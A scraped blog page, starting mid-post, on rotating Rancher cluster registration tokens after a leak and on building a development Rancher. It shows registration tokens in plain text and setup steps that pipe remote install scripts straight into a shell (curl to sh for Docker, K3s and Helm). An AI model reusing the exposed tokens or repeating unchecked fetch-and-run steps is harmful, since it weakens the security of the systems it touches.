  creationTimestamp: "2022-01-22T14:07:37Z"
  managedFields:
  - apiVersion: v1
    fieldsType: FieldsV1
    fieldsV1:
      f:data:
        .: {}
        f:namespace: {}
        f:token: {}
        f:url: {}
      f:metadata:
        f:annotations:
          .: {}
          f:kubectl.kubernetes.io/last-applied-configuration: {}
      f:type: {}
    manager: kubectl-client-side-apply
    operation: Update
    time: "2022-01-22T14:07:37Z"
  - apiVersion: v1
    fieldsType: FieldsV1
    fieldsV1:
      f:metadata:
        f:annotations:
          f:field.cattle.io/projectId: {}
    manager: agent
    operation: Update
    time: "2022-01-22T16:31:53Z"
  name: cattle-credentials-f945d4e
  namespace: cattle-system
  resourceVersion: "13094"
  uid: 88f3edc0-088a-49cc-87eb-bd1ca80f4f55
type: Opaque
Cattle credentials
Now let's look at the part where I posted my credentials online, on a blog, for example, and want to invalidate that token.
I can remove the current CRT, which Fleet will regenerate. In this case, I remove all of them from the local (old) cluster.
marco@cp1:~$ kubectl delete clusterregistrationtoken.management.cattle.io -n c-75snr crt-zztbw
clusterregistrationtoken.management.cattle.io "crt-zztbw" deleted
marco@cp1:~$ kubectl delete clusterregistrationtoken.management.cattle.io -n c-75snr default-token
clusterregistrationtoken.management.cattle.io "default-token" deleted
Deleting CRT's
After which, Fleet adds a new one when we open up the registration page in Rancher.
Cluster registration page
The new token is visible in the local cluster.
marco@cp1:~$ kubectl get clusterregistrationtoken.management.cattle.io -n c-75snr
NAME            AGE
crt-zpbl6       4m5s
default-token   3m5s
CRT's are recreated by Rancher's Fleet
To efficiently show the tokens, we can use custom columns.
kubectl get clusterregistrationtoken.management.cattle.io -n c-75snr -o custom-columns=NAME:.metadata.name,TOKEN:.status.token
NAME            TOKEN
crt-zpbl6       k8zvqgbwdcg5cpbp9jnckb9g6m8z4555vqk79f7vzgpnd94clws2w4
default-token   jntphjz86wl7w7jh624pfchvhnrzgvhdtn26bwnhwfml8rtk4rsnrh
While the old CRT is invalidated, the "testcrt" cluster is still connected. When we reboot the cluster, the following happens.
testcrt cluster is unable to connect due to token mismatch
In the cattle-agent pod, the following logs appear.
time="2022-01-22T17:02:04Z" level=info msg="Connecting to wss://rancher.fe.ax/v3/connect/register with token starting with qjrdq59d78gmbzlqp5vkvztcnpt"
time="2022-01-22T17:02:04Z" level=info msg="Connecting to proxy" url="wss://rancher.fe.ax/v3/connect/register"
time="2022-01-22T17:02:04Z" level=error msg="Failed to connect to proxy. Response status: 400 - 400 Bad Request. Response body: cluster not found" error="websocket: bad handshake"
time="2022-01-22T17:02:04Z" level=error msg="Remotedialer proxy error" error="websocket: bad handshake"
Cattle agent log
We now need to patch the credentials secret. Be sure to encode the token with base64, and the encoded string is not ending in Cg==, which means "newline".
root@cp2:~# kubectl \
  --cluster='testcrt-cp2' \
  -n cattle-system patch secret cattle-credentials-f945d4e \
  --type='json' \
  -p='[{"op" : "replace" ,"path" : "/data/token" ,"value" : "azh6dnFnYndkY2c1Y3BicDlqbmNrYjlnNm04ejQ
1NTV2cWs3OWY3dnpncG5kOTRjbHdzMnc0"}]'
secret/cattle-credentials-f945d4e patched
Patching the new token
After the secret is patched, we need to redeploy the cattle agent to reload the token.
root@cp2:~# kubectl --cluster='testcrt-cp2' rollout restart deployment -n cattle-system cattle-cluster-agent
deployment.apps/cattle-cluster-agent restarted
Once cattle agent is restarted, we'll see it's available in Rancher dashboard again.
testcrt is back online


Setting up a development version of Rancher
marco — Sat, 15 Jan 2022 20:48:34 GMT
After encountering a minor issue with Rancher's latest version, I decided to check if I could find more information about this problem by digging in the source code, adding some logging to the areas around the relevant parts. To start investigating this issue, I needed a testing environment that hopefully also shows this issue.
First, we need a machine to build and run Rancher. You can use a VirtualBox VM or some VPS online installed with Ubuntu 20.04.
There are a few prerequisites before you're able to build Rancher. For one, we need to install Docker, and we can do so by using Rancher's docker install script or any other way you'd prefer.
curl https://releases.rancher.com/install-docker/20.10.sh | sh
Installing Docker
Once that's installed, we'll need to set up a Kubernetes cluster. To make it easy, we'll use Rancher's lightweight Kubernetes distribution called K3s. We're using the docker engine to enable the use of docker images. K3s uses CRI-O by default, which doesn't use the images loaded into Docker by the build process later on.
curl -sfL https://get.k3s.io | sudo sh -s - --docker
sudo systemctl start k3s
sudo k3s kubectl get node
Install single node K3s
Once it's up and running showing a "Ready" node, we should install Kubectl for convenience.
# Note that this command downloads the matching client version
curl -LO "https://dl.k8s.io/release/$(k3s kubectl version --short=true | awk -F'[ +]' '{print $(NF-1); exit}')/bin/linux/amd64/kubectl"
sudo install -o root -g root -m 0755 kubectl /usr/local/bin/kubectl
rm -f kubectl
mkdir ~/.kube
sudo cat /etc/rancher/k3s/k3s.yaml > ~/.kube/config
chmod -R 600 ~/.kube/config
kubectl version
# Following lines are to enable bash completion
source <(kubectl completion bash) # setup autocomplete in bash into the current shell, bash-completion package should be installed first.
echo "source <(kubectl completion bash)" >> ~/.bashrc # add autocomplete permanently to your bash shell.
kubectl get nodes
Installing kubectl and copying the kubeconfig
Once that's up and running, let's install HELM to deploy the Rancher generated HELM package once we've created our develop build. We're living on the edge, so this will be easy.
curl https://raw.githubusercontent.com/helm/helm/main/scripts/get-helm-3 | bash
Installing HELM
We'll also need to use Docker directly. If you are using a regular user, you'll have to allow access to Docker by adding the user to the "docker" group.
sudo usermod -aG docker marco
# Restart session to reload privileges
Giving user privileges to Docker
Now we've set that up, we need to grab the source code and build it. We start by cloning the Rancher source code from their GitHub.
sudo apt install git make
# Make sure you are using the version tag you want
git clone https://github.com/rancher/rancher.git -b v2.6.3
Cloning Rancher
After we've cloned the source code, we can jump into building it. First, we'll remove the test step from the ci scripts; making Rancher build a lot quicker. You can also temporarily remove the validate step if you want it to be even quicker.
cd rancher
nano scripts/ci
Editing the ci script
The new ci script looks like this for me.
#!/bin/bash
set -e

cd $(dirname $0)

./validate
./build
#./test
./package
./chart/ci
Contents of the ci file in the scripts directory
We need to commit the change to the ci script and run "make". If you do not commit the change to git, the build process will tell you the repository is dirty.
git config --global user.email "feaxblog@gmail.com"
git config --global user.name "Marco Stuurman"
git commit -am "Disable tests for development"
make
# If it fails because of a timeout, try once more
Committing the changes
Running the make command may take a long time, depending on the system resources you've given the VM. The first build took me about 30 minutes. Once the building process finishes, you'll see docker images with the same tag as "VERSION" in the local registry.
marco@rdev:~/rancher$ docker images
REPOSITORY                     TAG              IMAGE ID       CREATED          SIZE
rancher/rancher-runtime        b209dbd85        8c3c1beccbe7   25 minutes ago   269MB
rancher/rancher-agent          b209dbd85        bd7908b20a0f   25 minutes ago   533MB
rancher/rancher                b209dbd85        3c4a1c6ce2d1   26 minutes ago   1.17GB
The output of docker images
The build process will automatically generate a HELM chart to deploy your development build version of Rancher. Let's deploy Rancher!
First, we need to install a cert-manager to let Rancher deal with the certificates.
kubectl apply -f https://github.com/jetstack/cert-manager/releases/download/v1.5.1/cert-manager.crds.yaml
helm repo add jetstack https://charts.jetstack.io
helm repo update
helm install cert-manager jetstack/cert-manager \
  --namespace cert-manager \
  --create-namespace \
  --version v1.5.1
Install cert-manager
Once that is installed, let's install Rancher itself.
kubectl create namespace cattle-system
helm install rancher \
  bin/chart/dev/rancher-0.0.0-1642269672.commit-b209dbd85.HEAD.tgz \
  --namespace cattle-system \
  --set hostname=rancher.your.domain \
  --set replicas=1 \
  --set bootstrapPassword=SomeGeneratedP4ssw0rd
Install your development Rancher
Let's check if Rancher can start.
marco@rdev:~/rancher$ kubectl get pods -n cattle-system
NAME                       READY   STATUS    RESTARTS      AGE
rancher-68b5949696-nqts9   0/1     Running   0             16s
rancher-68b5949696-qk9ng   0/1     Running   0             16s
rancher-68b5949696-h5k9z   0/1     Running   1 (13s ago)   16s
Rancher installation in progress
marco@rdev:~/rancher$ kubectl get pods -n cattle-system
NAME                               READY   STATUS      RESTARTS        AGE
rancher-68b5949696-h5k9z           1/1     Running     1 (3m27s ago)   3m30s
rancher-68b5949696-nqts9           1/1     Running     0               3m30s
rancher-68b5949696-qk9ng           1/1     Running     0               3m30s
helm-operation-s768m               0/2     Completed   0               2m53s
helm-operation-tvx2n               0/2     Completed   0               2m21s
rancher-webhook-5d4f5b7f6d-7mfhc   1/1     Running     0               2m9s
helm-operation-fm9z4               0/2     Completed   0               2m13s
Rancher is ready!
Let's open up the domain given to HELM in a browser.
Rancher dashboard
That worked! Now we can log in using the password given to HELM.
Once logged in, we can see our development version of Rancher running by checking the hamburger menu on the left top side.
Lets's set up Virtual Studio Code (vscode for short).
First, we need to install vscode. Which should be pretty straightforward.
Next, we should install some extensions. The following will be needed:
Remote - SSH
Go
Next we'
From now on, you can change whatever you need to the code, commit, build, helm upgrade and test.
I hope I find this blog post very interesting when I refresh my memory. To everyone else who reads this, thank you!
Additional information:
Don't forget to up the log level
kubectl -n cattle-system get pods -l app=rancher --no-headers -o custom-columns=name:.metadata.name | while read rancherpod; do kubectl -n cattle-system exec $rancherpod -c rancher -- loglevel --set debug; done

FeaX's Blog

Speed up kubectl commands (and k9s) when using AWS

Isolating DevOps changes using ephemeral infra environments

The idea

Test is a production cluster

Hand-sculpting a beautifully unstable cluster

Cluster generation with PRs

Cluster upgrade testing

Example scenario

Cost control

Track costs

Shut down the environment

Disable features

Nuke it

Conclusion

Bootstrapping Terraform GitHub Actions for AWS

Bootstrapping the basics

Creating the S3 and DynamoDB Terraform

Bootstrapping the remote state

Setting up a GitHub Actions Pipeline for Terraform

Merging is only available if the plan succeeds

Run the apply job only if there are changes

Require manual approval for the apply job to run

Concluding the GitHub Action pipeline

Trusting the GitHub repository using OIDC

Adding the identity provider to AWS using Terraform

Creating a role for Github to assume

Applying the configuration

Testing the GitHub Actions workflow

Destroying everything

Conclusion

Versions used

Creating a golden image with Packer

Getting started

Installing Packer

IAM policy and role for Packer in AWS

Using Terraform to create IAM resources

Preparing and validating Packer

Preparing images with provisioners

Costs

Final thoughts on Packer

Write-up of CVE-2021-36782: Exposure of credentials in Rancher API

Summary

The service account

Accessing Rancher's service account token

Using the JWT token

The new way

Reproducing the issue

Conclusion

From Terraform monolith to modules

Conclusion

Efficiently scaling RKE with Terraform

Creating multiple instances

Dynamic RKE nodes

Security groups

Scaling RKE

Conclusion

Rancher with Terraform on CloudStack

Creating the first VM

Setting up the security groups

Adding keys to access the machine

Installing the required packages

Setting up RKE

Getting the kubeconfig.yaml

Installing Rancher

Unforeseen dependency problems

Breaking apart the monolith

Cloud

RKE

Rancher

Testing it again

Conclusion

Using custom providers in Terraform

Reliability DRBD

What if the network starts flapping?

What if we have a broken network connection that allows 10Mbps?

What if a node gets panicked during writes?

Conclusion

Diskless DRBD

Hacking friends in Pokemon Yellow

Require manual approval for the `apply` job to run